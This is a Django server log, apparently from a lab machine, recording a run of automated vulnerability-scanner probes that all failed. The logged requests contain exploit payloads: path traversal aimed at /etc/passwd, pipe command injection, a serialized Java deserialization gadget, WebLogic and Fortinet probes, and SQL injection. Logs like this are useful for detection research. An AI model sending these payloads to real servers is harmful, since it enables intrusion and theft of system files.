[07/Nov/2020 22:25:38] "GET /scripts/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK HTTP/1.1" 404 2299
Not Found: /
[07/Nov/2020 22:25:42] "GET / HTTP/1.1" 404 2154
Not Found: /samples/quickstart/docs/index.html
[07/Nov/2020 22:25:42] "GET /samples/quickstart/docs/index.html HTTP/1.1" 404 2274
Not Found: /ws_utc/resources/setting/options/general
[07/Nov/2020 22:25:42] "GET /ws_utc/resources/setting/options/general HTTP/1.1" 404 2292
Not Found: /CVS/Entries
[07/Nov/2020 22:25:43] "GET /CVS/Entries HTTP/1.1" 404 2200
Not Found: /cgi-bin/index.cgi
[07/Nov/2020 22:25:44] "GET /cgi-bin/index.cgi HTTP/1.1" 404 2223
Not Found: /cgi-bin/index
[07/Nov/2020 22:25:46] "POST /cgi-bin/index?LD_PRELOAD=/proc/self/fd/0 HTTP/1.1" 404 2239
Not Found: /cgi-bin/index
[07/Nov/2020 22:25:46] "POST /cgi-bin/index?LD_PRELOAD=/proc/self/fd/0 HTTP/1.1" 404 2239
Not Found: /cgi-bin/index.cgi
[07/Nov/2020 22:25:46] "POST /cgi-bin/index.cgi?LD_PRELOAD=/proc/self/fd/0 HTTP/1.1" 404 2251
Not Found: /cgi-bin/index.cgi
[07/Nov/2020 22:25:46] "POST /cgi-bin/index.cgi?LD_PRELOAD=/proc/self/fd/0 HTTP/1.1" 404 2251
Not Found: /cgi-bin/upload.cgi
[07/Nov/2020 22:25:46] "POST /cgi-bin/upload.cgi?LD_PRELOAD=/proc/self/fd/0 HTTP/1.1" 404 2254
Not Found: /cgi-bin/upload.cgi
[07/Nov/2020 22:25:46] "POST /cgi-bin/upload.cgi?LD_PRELOAD=/proc/self/fd/0 HTTP/1.1" 404 2254
Not Found: /script
[07/Nov/2020 22:25:46] "GET /script HTTP/1.1" 404 2190
Not Found: /cgi-bin/ftp/ftp.pl
[07/Nov/2020 22:25:47] "GET /cgi-bin/ftp/ftp.pl?dir=../../../../../../etc HTTP/1.1" 404 2247
Not Found: /scripts/ftp/ftp.pl
[07/Nov/2020 22:25:47] "GET /scripts/ftp/ftp.pl?dir=../../../../../../etc HTTP/1.1" 404 2247
Not Found: /wxjsapi/saveYZJFile
[07/Nov/2020 22:25:48] "GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:////etc/passwd&fileExt=txt HTTP/1.1" 404 2295
Not Found: /
[07/Nov/2020 22:25:49] "GET / HTTP/1.1" 404 2154
Not Found: /
[07/Nov/2020 22:25:51] "GET / HTTP/1.1" 404 2154
----------------------------------------
Exception happened during processing of request from ('192.168.199.130', 35354)
Traceback (most recent call last):
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /
[07/Nov/2020 22:25:52] "GET / HTTP/1.1" 404 2154
Not Found: /cgi-bin/shopper.cgi
[07/Nov/2020 22:25:53] "GET /cgi-bin/shopper.cgi?newpage=../../../../../../etc/passwd HTTP/1.1" 404 2261
Not Found: /scripts/shopper.cgi
[07/Nov/2020 22:25:54] "GET /scripts/shopper.cgi?newpage=../../../../../../etc/passwd HTTP/1.1" 404 2261
Not Found: /wls-wsat/CoordinatorPortType
[07/Nov/2020 22:25:55] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 2257
Not Found: /wls-wsat/CoordinatorPortType
[07/Nov/2020 22:25:55] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 2257
Not Found: /bea_wls_internal/__scantest.txt
[07/Nov/2020 22:25:55] "GET /bea_wls_internal/__scantest.txt HTTP/1.1" 404 2265
Not Found: /wls-wsat/CoordinatorPortType
[07/Nov/2020 22:25:55] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 2257
Not Found: /wls-wsat/CoordinatorPortType11
[07/Nov/2020 22:25:55] "POST /wls-wsat/CoordinatorPortType11 HTTP/1.1" 404 2263
Not Found: /wls-wsat/CoordinatorPortType11
[07/Nov/2020 22:25:55] "POST /wls-wsat/CoordinatorPortType11 HTTP/1.1" 404 2263
Not Found: /bea_wls_internal/__scantest.txt
[07/Nov/2020 22:25:55] "GET /bea_wls_internal/__scantest.txt HTTP/1.1" 404 2265
Not Found: /wls-wsat/CoordinatorPortType11
[07/Nov/2020 22:25:56] "POST /wls-wsat/CoordinatorPortType11 HTTP/1.1" 404 2263
Not Found: /_async/AsyncResponseService
[07/Nov/2020 22:25:56] "POST /_async/AsyncResponseService HTTP/1.1" 404 2254
Not Found: /_async/AsyncResponseService
[07/Nov/2020 22:25:56] "POST /_async/AsyncResponseService HTTP/1.1" 404 2254
Not Found: /bea_wls_internal/__scantest.txt
[07/Nov/2020 22:25:56] "GET /bea_wls_internal/__scantest.txt HTTP/1.1" 404 2265
Not Found: /_async/AsyncResponseService
[07/Nov/2020 22:25:56] "POST /_async/AsyncResponseService HTTP/1.1" 404 2254
Not Found: /DVR.cfg
[07/Nov/2020 22:25:57] "GET /DVR.cfg HTTP/1.1" 404 2193
Not Found: /demo/ojspext/events/globals.jsa
[07/Nov/2020 22:25:57] "GET /demo/ojspext/events/globals.jsa HTTP/1.1" 404 2260
Not Found: /
[07/Nov/2020 22:25:58] "GET /?sql_debug=1 HTTP/1.1" 404 2161
[07/Nov/2020 22:25:59] code 400, message Bad request syntax ("Ú»¢\x00\x00\x00\x00\x00\x01RsÇ\x00\x00\x02\x96HC0'com.rometools.rome.feed.impl.EqualsBean\x92\tbeanClass\x03obj`C\x0fjava.lang.Class\x91\x04namea0)com.rometools.rome.feed.impl.ToStringBeanC0)com.rometools.rome.feed.impl.ToStringBean\x92\tbeanClass\x03objba\x1dcom.sun.rowset.JdbcRowSetImplC\x1dcom.sun.rowset.JdbcRowSetImpl¬\x07command\x03URL")
[07/Nov/2020 22:25:59] "Ú»¢     RsÇ  HC0'com.rometools.rome.feed.impl.EqualsBean	beanClassobj`Cjava.lang.Classnamea0)com.rometools.rome.feed.impl.ToStringBeanC0)com.rometools.rome.feed.impl.ToStringBean	beanClassobjbacom.sun.rowset.JdbcRowSetImplCcom.sun.rowset.JdbcRowSetImpl¬commandURL" 400 -
Not Found: /scantest.txt
[07/Nov/2020 22:26:02] "PUT /scantest.txt HTTP/1.1" 404 2208
Not Found: /cgi-bin/calendar_admin.pl
[07/Nov/2020 22:26:03] "GET /cgi-bin/calendar_admin.pl?config=|cat%20/etc/passwd| HTTP/1.1" 404 2273
Not Found: /
[07/Nov/2020 22:26:03] "GET / HTTP/1.1" 404 2154
Not Found: /cgi-bin/calendar/calendar_admin.pl
[07/Nov/2020 22:26:03] "GET /cgi-bin/calendar/calendar_admin.pl?config=|cat%20/etc/passwd| HTTP/1.1" 404 2300
Not Found: /wls-wsat/CoordinatorPortType
[07/Nov/2020 22:26:03] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 2257
Not Found: /wls-wsat/CoordinatorPortType
[07/Nov/2020 22:26:03] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 2257
Not Found: /cgi-bin/calendar/calender.pl
[07/Nov/2020 22:26:03] "GET /cgi-bin/calendar/calender.pl?config=|cat%20/etc/passwd| HTTP/1.1" 404 2282
Not Found: /bea_wls_internal/_scantest.txt
[07/Nov/2020 22:26:04] "GET /bea_wls_internal/_scantest.txt HTTP/1.1" 404 2262
Not Found: /scripts/calendar_admin.pl
[07/Nov/2020 22:26:04] "GET /scripts/calendar_admin.pl?config=|cat%20/etc/passwd| HTTP/1.1" 404 2273
Not Found: /scripts/calendar/calendar_admin.pl
[07/Nov/2020 22:26:04] "GET /scripts/calendar/calendar_admin.pl?config=|cat%20/etc/passwd| HTTP/1.1" 404 2300
Not Found: /scripts/calendar/calender.pl
[07/Nov/2020 22:26:04] "GET /scripts/calendar/calender.pl?config=|cat%20/etc/passwd| HTTP/1.1" 404 2282
Not Found: /wls-wsat/CoordinatorPortType
[07/Nov/2020 22:26:04] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 2257
Not Found: /wls-wsat/CoordinatorPortType11
[07/Nov/2020 22:26:04] "POST /wls-wsat/CoordinatorPortType11 HTTP/1.1" 404 2263
Not Found: /wls-wsat/CoordinatorPortType11
[07/Nov/2020 22:26:04] "POST /wls-wsat/CoordinatorPortType11 HTTP/1.1" 404 2263
Not Found: /bea_wls_internal/_scantest.txt
[07/Nov/2020 22:26:04] "GET /bea_wls_internal/_scantest.txt HTTP/1.1" 404 2262
Not Found: /
[07/Nov/2020 22:26:04] "GET / HTTP/1.1" 404 2154
Not Found: /wls-wsat/CoordinatorPortType11
[07/Nov/2020 22:26:04] "POST /wls-wsat/CoordinatorPortType11 HTTP/1.1" 404 2263
Not Found: /_async/AsyncResponseService
[07/Nov/2020 22:26:04] "POST /_async/AsyncResponseService HTTP/1.1" 404 2254
Not Found: /_async/AsyncResponseService
[07/Nov/2020 22:26:04] "POST /_async/AsyncResponseService HTTP/1.1" 404 2254
Not Found: /bea_wls_internal/_scantest.txt
[07/Nov/2020 22:26:05] "GET /bea_wls_internal/_scantest.txt HTTP/1.1" 404 2262
Not Found: /_async/AsyncResponseService
[07/Nov/2020 22:26:05] "POST /_async/AsyncResponseService HTTP/1.1" 404 2254
Not Found: /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp
[07/Nov/2020 22:26:05] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 404 2357
Not Found: /RsasTest831083925.html
[07/Nov/2020 22:26:06] "GET /RsasTest831083925.html HTTP/1.1" 404 2233
Not Found: /
[07/Nov/2020 22:26:06] "GET / HTTP/1.1" 404 2154
----------------------------------------
Exception happened during processing of request from ('192.168.199.130', 42968)
Traceback (most recent call last):
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /phprocketaddin/
[07/Nov/2020 22:26:06] "GET /phprocketaddin/?page=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 2273
Not Found: /index.php
[07/Nov/2020 22:26:06] "GET /index.php?page=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 2255
Not Found: /phprocketaddin/
[07/Nov/2020 22:26:06] "GET /phprocketaddin/?page=../../../../../../../../../../../../../../../WINNT/system32/ipconfig.exe HTTP/1.1" 404 2290
Not Found: /index.php
[07/Nov/2020 22:26:06] "GET /index.php?page=../../../../../../../../../../../../../../../../../WINNT/system32/ipconfig.exe HTTP/1.1" 404 2278
Not Found: /maintain_feedback.asp
[07/Nov/2020 22:26:06] "GET /maintain_feedback.asp?userLogin.asp HTTP/1.0" 404 2249
Not Found: /bin/cgicso
[07/Nov/2020 22:26:07] "GET /bin/cgicso?query=AAA HTTP/1.1" 404 2207
Not Found: /cgi-local/cgiemail-1.4/cgicso
[07/Nov/2020 22:26:07] "GET /cgi-local/cgiemail-1.4/cgicso?query=AAA HTTP/1.1" 404 2264
Not Found: /cgi-local/cgicso
[07/Nov/2020 22:26:07] "GET /cgi-local/cgicso?query=AAA HTTP/1.1" 404 2225
Not Found: /cgi/cgiemail/cgicso
[07/Nov/2020 22:26:07] "GET /cgi/cgiemail/cgicso?query=AAA HTTP/1.1" 404 2234
Not Found: /html/cgi-bin/cgicso
[07/Nov/2020 22:26:07] "GET /html/cgi-bin/cgicso?query=AAA HTTP/1.1" 404 2234
Not Found: /cgi-local/cgiemail-1.6/cgicso
[07/Nov/2020 22:26:07] "GET /cgi-local/cgiemail-1.6/cgicso?query=AAA HTTP/1.1" 404 2264
Not Found: /cgi-bin/cgicso
[07/Nov/2020 22:26:07] "GET /cgi-bin/cgicso?query=AAA HTTP/1.1" 404 2219
Not Found: /scripts/cgicso
[07/Nov/2020 22:26:07] "GET /scripts/cgicso?query=AAA HTTP/1.1" 404 2219
Not Found: /cgi-bin/Count.cgi
[07/Nov/2020 22:26:08] "GET /cgi-bin/Count.cgi HTTP/1.1" 404 2218
Not Found: /robots.txt
[07/Nov/2020 22:26:09] "GET /robots.txt HTTP/1.0" 404 2197
Not Found: /RsasTest27856718.html
[07/Nov/2020 22:26:09] "GET /RsasTest27856718.html HTTP/1.1" 404 2230
Not Found: /admin.php
[07/Nov/2020 22:26:09] "GET /admin.php?upload=1&file=config.php&file_name=RSAS.txt&wdir=/images/&userfile=config.php&userfile_name=RSAS.txt HTTP/1.1" 404 2315
Not Found: /images/RSAS.txt
[07/Nov/2020 22:26:10] "GET /images/RSAS.txt HTTP/1.1" 404 2212
Not Found: /nuke/admin.php
[07/Nov/2020 22:26:10] "GET /nuke/admin.php?upload=1&file=config.php&file_name=RSAS.txt&wdir=/images/&userfile=config.php&userfile_name=RSAS.txt HTTP/1.1" 404 2330
Not Found: /PSUser/PSCOErrPage.htm
[07/Nov/2020 22:26:10] "GET /PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd HTTP/1.1" 404 2257
Not Found: /images/RSAS.txt
[07/Nov/2020 22:26:10] "GET /images/RSAS.txt HTTP/1.1" 404 2212
Not Found: /demo/admin.php
[07/Nov/2020 22:26:10] "GET /demo/admin.php?upload=1&file=config.php&file_name=RSAS.txt&wdir=/images/&userfile=config.php&userfile_name=RSAS.txt HTTP/1.1" 404 2330
Not Found: /?.jsp
[07/Nov/2020 22:26:10] "GET /%3f.jsp HTTP/1.1" 404 2184
Not Found: /images/RSAS.txt
[07/Nov/2020 22:26:10] "GET /images/RSAS.txt HTTP/1.1" 404 2212
Not Found: /phpnuke/html/admin.php
[07/Nov/2020 22:26:10] "GET /phpnuke/html/admin.php?upload=1&file=config.php&file_name=RSAS.txt&wdir=/images/&userfile=config.php&userfile_name=RSAS.txt HTTP/1.1" 404 2354
Not Found: /images/RSAS.txt
[07/Nov/2020 22:26:10] "GET /images/RSAS.txt HTTP/1.1" 404 2212
Not Found: /php_nuke/html/admin.php
[07/Nov/2020 22:26:10] "GET /php_nuke/html/admin.php?upload=1&file=config.php&file_name=RSAS.txt&wdir=/images/&userfile=config.php&userfile_name=RSAS.txt HTTP/1.1" 404 2357
Not Found: /images/RSAS.txt
[07/Nov/2020 22:26:11] "GET /images/RSAS.txt HTTP/1.1" 404 2212
Not Found: /php/admin.php
[07/Nov/2020 22:26:11] "GET /php/admin.php?upload=1&file=config.php&file_name=RSAS.txt&wdir=/images/&userfile=config.php&userfile_name=RSAS.txt HTTP/1.1" 404 2327
Not Found: /_cat
[07/Nov/2020 22:26:11] "GET /_cat HTTP/1.1" 404 2184
Not Found: /images/RSAS.txt
[07/Nov/2020 22:26:11] "GET /images/RSAS.txt HTTP/1.1" 404 2212
Not Found: /phpnew/admin.php
[07/Nov/2020 22:26:11] "GET /phpnew/admin.php?upload=1&file=config.php&file_name=RSAS.txt&wdir=/images/&userfile=config.php&userfile_name=RSAS.txt HTTP/1.1" 404 2336
Not Found: /../../../../../../../etc/passwd
[07/Nov/2020 22:26:11] "GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 404 2239
Not Found: /images/RSAS.txt
[07/Nov/2020 22:26:11] "GET /images/RSAS.txt HTTP/1.1" 404 2212
Not Found: /nuke50/admin.php
[07/Nov/2020 22:26:11] "GET /nuke50/admin.php?upload=1&file=config.php&file_name=RSAS.txt&wdir=/images/&userfile=config.php&userfile_name=RSAS.txt HTTP/1.1" 404 2336
Not Found: /jsrpc.php
[07/Nov/2020 22:26:11] "GET /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(1,concat(1,user()),1) HTTP/1.1" 404 2337
Not Found: /images/RSAS.txt
[07/Nov/2020 22:26:11] "GET /images/RSAS.txt HTTP/1.1" 404 2212
Not Found: /cgi-bin/admin.php
[07/Nov/2020 22:26:11] "GET /cgi-bin/admin.php?upload=1&file=config.php&file_name=RSAS.txt&wdir=/images/&userfile=config.php&userfile_name=RSAS.txt HTTP/1.1" 404 2339
Not Found: /images/RSAS.txt
[07/Nov/2020 22:26:11] "GET /images/RSAS.txt HTTP/1.1" 404 2212
Not Found: /perl/
[07/Nov/2020 22:26:12] "GET /perl/ HTTP/1.1" 404 2182
Not Found: /scripts/admin.php
[07/Nov/2020 22:26:12] "GET /scripts/admin.php?upload=1&file=config.php&file_name=RSAS.txt&wdir=/images/&userfile=config.php&userfile_name=RSAS.txt HTTP/1.1" 404 2339
Not Found: /images/RSAS.txt
[07/Nov/2020 22:26:12] "GET /images/RSAS.txt HTTP/1.1" 404 2212
Not Found: /xsql/demo/adhocsql/query.xsql
[07/Nov/2020 22:26:14] "GET /xsql/demo/adhocsql/query.xsql?sql=select%20username%20from%20ALL_USERS HTTP/1.1" 404 2295
Not Found: /doc/page/login.asp
[07/Nov/2020 22:26:16] "GET /doc/page/login.asp HTTP/1.1" 404 2226
----------------------------------------
Exception happened during processing of request from ('192.168.199.130', 45650)
Traceback (most recent call last):
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /nosuchfile.php/123
[07/Nov/2020 22:26:17] "GET /nosuchfile.php/123 HTTP/1.1" 404 2221
Not Found: /
[07/Nov/2020 22:26:17] "POST / HTTP/1.1" 404 2155
Not Found: /org.apache.dubbo.samples.http.api.DemoService
[07/Nov/2020 22:26:18] "POST /org.apache.dubbo.samples.http.api.DemoService HTTP/1.1" 404 2308
Not Found: /RsasTest156741598.html
[07/Nov/2020 22:26:18] "GET /RsasTest156741598.html HTTP/1.1" 404 2233
Not Found: /cgi-bin/simple/view_page
[07/Nov/2020 22:26:18] "GET /cgi-bin/simple/view_page?mv_arg=|cat%20/etc/passwd| HTTP/1.1" 404 2270
Not Found: /update/../../../../../../../../../../../etc/passwd
[07/Nov/2020 22:26:19] "GET /update/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd HTTP/1.1" 404 2282
Not Found: /RsasTest1156409091.html
[07/Nov/2020 22:26:19] "GET /RsasTest1156409091.html HTTP/1.1" 404 2236
Not Found: /scripts/simple/view_page
Not Found: /main.php
[07/Nov/2020 22:26:19] "GET /scripts/simple/view_page?mv_arg=|cat%20/etc/passwd| HTTP/1.1" 404 2270
[07/Nov/2020 22:26:19] "GET /main.php HTTP/1.1" 404 2196
Not Found: /phpMyAdmin/main.php
[07/Nov/2020 22:26:19] "GET /phpMyAdmin/main.php HTTP/1.1" 404 2229
Not Found: /phpmyadmin/main.php
[07/Nov/2020 22:26:19] "GET /phpmyadmin/main.php HTTP/1.1" 404 2229
Not Found: /cgi-bin/webplus
[07/Nov/2020 22:26:19] "GET /cgi-bin/webplus?script=/../../../../etc/passwd HTTP/1.1" 404 2243
Not Found: /cgi-bin/main.php
[07/Nov/2020 22:26:19] "GET /cgi-bin/main.php HTTP/1.1" 404 2220
Not Found: /scripts/main.php
Not Found: /scripts/webplus
[07/Nov/2020 22:26:19] "GET /scripts/main.php HTTP/1.1" 404 2220
[07/Nov/2020 22:26:19] "GET /scripts/webplus?script=/../../../../etc/passwd HTTP/1.1" 404 2243
Not Found: /cgi-bin/commerce.cgi
[07/Nov/2020 22:26:19] "GET /cgi-bin/commerce.cgi?page=../../../../../etc/passwd%00index.html HTTP/1.1" 404 2271
Not Found: /scripts/commerce.cgi
[07/Nov/2020 22:26:20] "GET /scripts/commerce.cgi?page=../../../../../etc/passwd%00index.html HTTP/1.1" 404 2271
Not Found: /remote/fgt_lang
[07/Nov/2020 22:26:22] "GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1" 404 2271
Not Found: /forum/calendar.php
[07/Nov/2020 22:26:23] "GET /forum/calendar.php HTTP/1.0" 404 2221
Not Found: /
[07/Nov/2020 22:26:23] "GET / HTTP/1.1" 404 2154
Not Found: /e-cidade/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
[07/Nov/2020 22:26:25] "GET /e-cidade/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd HTTP/1.1" 404 2495
Not Found: /way-board/way-board.cgi
[07/Nov/2020 22:26:25] "GET /way-board/way-board.cgi?db=/etc/passwd%00 HTTP/1.1" 404 2254
Not Found: /cgi-bin/way-board/way-board.cgi
[07/Nov/2020 22:26:26] "GET /cgi-bin/way-board/way-board.cgi?db=/etc/passwd%00 HTTP/1.1" 404 2278
Not Found: /scripts/way-board/way-board.cgi
[07/Nov/2020 22:26:26] "GET /scripts/way-board/way-board.cgi?db=/etc/passwd%00 HTTP/1.1" 404 2278
Not Found: /index.action
[07/Nov/2020 22:26:27] "GET index.action?redirect:http://www.baidu.com/ HTTP/1.1" 404 1680
----------------------------------------
Exception happened during processing of request from ('192.168.199.130', 52554)
Traceback (most recent call last):
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /infosrch.cgi
[07/Nov/2020 22:26:27] "GET /infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/id HTTP/1.1" 404 2246
Not Found: /login.action
[07/Nov/2020 22:26:27] "GET login.action?redirect:http://www.baidu.com/ HTTP/1.1" 404 1680
Not Found: /cgi-bin/infosrch.cgi
[07/Nov/2020 22:26:27] "GET /cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/usr/bin/id HTTP/1.1" 404 2274
----------------------------------------
Exception happened during processing of request from ('192.168.199.130', 52620)
Traceback (most recent call last):
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /index.do
[07/Nov/2020 22:26:27] "GET index.do?redirect:http://www.baidu.com/ HTTP/1.1" 404 1668
----------------------------------------
Exception happened during processing of request from ('192.168.199.130', 52688)
Traceback (most recent call last):
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /infosrch.cgi
[07/Nov/2020 22:26:28] "GET /infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/id HTTP/1.1" 404 2246
Not Found: /server-status
[07/Nov/2020 22:26:28] "GET /server-status HTTP/1.1" 404 2206
Not Found: /login.do
[07/Nov/2020 22:26:28] "GET login.do?redirect:http://www.baidu.com/ HTTP/1.1" 404 1668
Not Found: /scripts/infosrch.cgi
[07/Nov/2020 22:26:28] "GET /scripts/infosrch.cgi?cmd=getdoc&db=man&fname=|/usr/bin/id HTTP/1.1" 404 2274
----------------------------------------
Exception happened during processing of request from ('192.168.199.130', 52726)
Traceback (most recent call last):
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /
[07/Nov/2020 22:26:28] "GET / HTTP/1.1" 404 2154
Not Found: /cgit/
[07/Nov/2020 22:26:28] "GET /cgit/ HTTP/1.1" 404 2187
Not Found: /*/onvifsnapshot/*/
[07/Nov/2020 22:26:29] "GET /*/onvifsnapshot/*/ HTTP/1.1" 404 2226
Not Found: /api/edr/sangforinter/v2/cssp/slog_client
[07/Nov/2020 22:26:29] "POST /api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9 HTTP/1.1" 404 2316
Not Found: /*/onvifsnapshot/*/
[07/Nov/2020 22:26:29] "GET /*/onvifsnapshot/*/ HTTP/1.1" 404 2226
Not Found: /cgi-bin/loadpage.cgi
[07/Nov/2020 22:26:30] "GET /cgi-bin/loadpage.cgi?user_id=1&file=../../../../../../etc/passwd HTTP/1.1" 404 2275
Not Found: /cgi-bin/loadpage.cgi
[07/Nov/2020 22:26:31] "GET /cgi-bin/loadpage.cgi?user_id=1&file=..\..\..\..\..\..\..\..\winnt\win.ini HTTP/1.1" 404 2302
Not Found: /cgi-bin/search.cgi
[07/Nov/2020 22:26:31] "GET /cgi-bin/search.cgi?user_id=1&database=..\..\..\..\..\..\..\..\winnt\win.ini&template=..\..\..\..\..\..\..\winnt\win.ini&distinct=1 HTTP/1.1" 404 2379
